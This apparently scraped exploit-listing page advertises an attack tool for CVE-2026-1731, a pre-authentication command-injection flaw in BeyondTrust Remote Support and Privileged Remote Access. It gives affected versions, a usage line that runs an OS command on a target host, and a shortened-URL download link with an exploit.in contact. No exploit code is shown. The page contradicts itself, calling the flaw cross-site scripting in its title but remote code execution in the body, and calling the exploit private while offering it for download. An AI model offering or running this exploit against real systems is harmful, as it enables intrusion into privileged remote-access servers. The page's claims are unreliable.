## https://sploitus.com/exploit?id=092D4155-C0AB-554F-84B1-F7EA941D4F09
# Security Unauthenticated Stored Cross-Site Scripting (CVE-2026-1731)
## Overview
A CRITICAL vulnerability, classified as CVE-2026-1731, has been identified, categorized under CWE-78, (CVSS 9.8). BeyondTrust Remote Support (RS) and certain older versions of Privileged Remote Access (PRA) contain a critical pre-authentication remote code execution vulnerability. By sending specially crafted requests, an unauthenticated remote attacker may be able to execute operating system commands in the context of the site user.
## Details
- **CVE ID**: [CVE-2026-1731](https://nvd.nist.gov/vuln/detail/CVE-2026-1731)
- **Discovered**: 2026-02-06
- **Published**: 2026-02-06
- **Impact**: Confidentiality, Integrity, Availability
- **Exploit Availability**: Not public, only private.
## Vulnerability Description
BeyondTrust Remote Support (RS) and certain older versions of Privileged Remote Access (PRA) contain a critical pre-authentication remote code execution vulnerability. By sending specially crafted requests, an unauthenticated remote attacker may be able to execute operating system commands in the context of the site user.
## Affected Versions
**Beyondtrust Privileged Remote Access:**
- before 25.1
**Beyondtrust Remote Support:**
- before 25.3.2
## Running
To run exploit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```
## Contact
For inquiries, please contact **security@exploit.in**
## Exploit:
### [Download here](https://tinyurl.com/2bq6nxdk)
